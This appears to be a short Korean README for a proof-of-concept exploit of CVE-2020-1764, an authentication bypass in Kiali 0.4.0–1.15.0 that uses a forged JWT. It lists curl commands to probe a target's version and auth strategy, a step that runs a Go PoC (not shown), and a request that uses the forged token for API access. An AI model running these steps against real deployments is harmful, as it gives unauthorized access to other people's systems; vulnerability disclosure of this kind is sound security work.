
CVE-2020-1764에 대한 개념 증명 익스플로잇: Kiali 0.4.0–1.15.0의 인증 우회로, 조작된 JWT 토큰을 통해 무단 API 액세스를 가능하게 합니다.
Kiali 0.4.0 ~ 1.15.0에서 로그인 인증 전략을 사용하는 인증 우회 PoC (Security Bulletin)
버전 확인: curl 'http://<IP>/api
인증 전략 확인: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"